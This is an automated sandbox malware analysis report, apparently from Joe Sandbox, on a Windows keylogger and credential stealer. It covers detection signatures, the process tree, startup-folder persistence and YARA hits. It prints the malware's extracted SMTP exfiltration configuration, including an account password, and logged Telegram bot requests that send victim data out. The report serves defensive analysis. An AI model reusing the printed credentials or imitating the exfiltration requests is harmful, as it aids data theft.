
Windows Analysis Report
3i1gMM8K4z.exe

Overview

General Information

Sample name: 3i1gMM8K4z.exe (renamed because the original name is a hash value)
Original sample name: ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944.exe
Analysis ID: 1588301
MD5: 1d0c53e42bd84b7b7cfabed7dae7f570
SHA1: 0b0df40afe9bed5720c361fe7ed63395e1a25f41
SHA256: ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944
Tags: exe, RedLineStealer, user-adrian__luca

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 3i1gMM8K4z.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
    • ghauts.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
      • RegSvcs.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ghauts.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
      • RegSvcs.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 DE 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 5.2.ghauts.exe.3dd0000.1.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings: same six strings ($s1 to $s6) as listed above
Source: 1.2.ghauts.exe.730000.1.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings: same six strings ($s1 to $s6) as listed above
Source: 2.2.RegSvcs.exe.2dd0000.2.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 2.2.RegSvcs.exe.2dd0000.2.unpack | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 2.2.RegSvcs.exe.2dd0000.2.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security

                System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , ProcessId: 7776, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , ProcessId: 7776, ProcessName: wscript.exe

                Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Okeghem\ghauts.exe, ProcessId: 7488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T23:44:13.314218+0100  2803305  3         Unknown Traffic          192.168.2.4  49733        104.21.16.1      443               TCP
2025-01-10T23:44:15.771851+0100  2803305  3         Unknown Traffic          192.168.2.4  49737        104.21.16.1      443               TCP
2025-01-10T23:44:18.167719+0100  2803305  3         Unknown Traffic          192.168.2.4  49742        104.21.16.1      443               TCP
2025-01-10T23:44:21.863717+0100  2803305  3         Unknown Traffic          192.168.2.4  49753        104.21.16.1      443               TCP
2025-01-10T23:44:28.800937+0100  2803305  3         Unknown Traffic          192.168.2.4  49757        104.21.16.1      443               TCP
2025-01-10T23:44:31.182244+0100  2803305  3         Unknown Traffic          192.168.2.4  49761        104.21.16.1      443               TCP
2025-01-10T23:44:33.684415+0100  2803305  3         Unknown Traffic          192.168.2.4  49765        104.21.16.1      443               TCP
2025-01-10T23:44:34.928756+0100  2803305  3         Unknown Traffic          192.168.2.4  49767        104.21.16.1      443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T23:44:11.833778+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49731        158.101.44.242   80                TCP
2025-01-10T23:44:12.740058+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49731        158.101.44.242   80                TCP
2025-01-10T23:44:13.974425+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49734        158.101.44.242   80                TCP
2025-01-10T23:44:15.177541+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49736        158.101.44.242   80                TCP
2025-01-10T23:44:27.333823+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49755        158.101.44.242   80                TCP
2025-01-10T23:44:28.240064+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49755        158.101.44.242   80                TCP
2025-01-10T23:44:29.427855+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49758        158.101.44.242   80                TCP
2025-01-10T23:44:30.599431+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49760        158.101.44.242   80                TCP
2025-01-10T23:44:31.818323+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49762        158.101.44.242   80                TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T23:44:22.751745+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49754        149.154.167.220  443               TCP
2025-01-10T23:44:38.256299+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49772        149.154.167.220  443               TCP


                AV Detection

Source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.2dd0000.2.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | ReversingLabs: Detection: 65%
Source: 3i1gMM8K4z.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Joe Sandbox ML: detected
Source: 3i1gMM8K4z.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 3i1gMM8K4z.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49756 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4445A
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4C6D1 FindFirstFileW,FindClose,0_2_00F4C6D1
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F4C75C
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4EF95
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4F0F2
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4F3F3
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F437EF
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F43B12
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4BCBC
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_005F445A
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FC6D1 FindFirstFileW,FindClose,1_2_005FC6D1
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005FC75C
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FEF95
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FF0F2
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FF3F3
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F37EF
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F3B12
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FBCBC
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 2_2_02BFE0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 8_2_0121E0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0566F225h | 8_2_0566F038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0566FBAFh | 8_2_0566F038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_0566E558

                Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49772 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49754 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49762 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.16.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49756 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F522EE
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
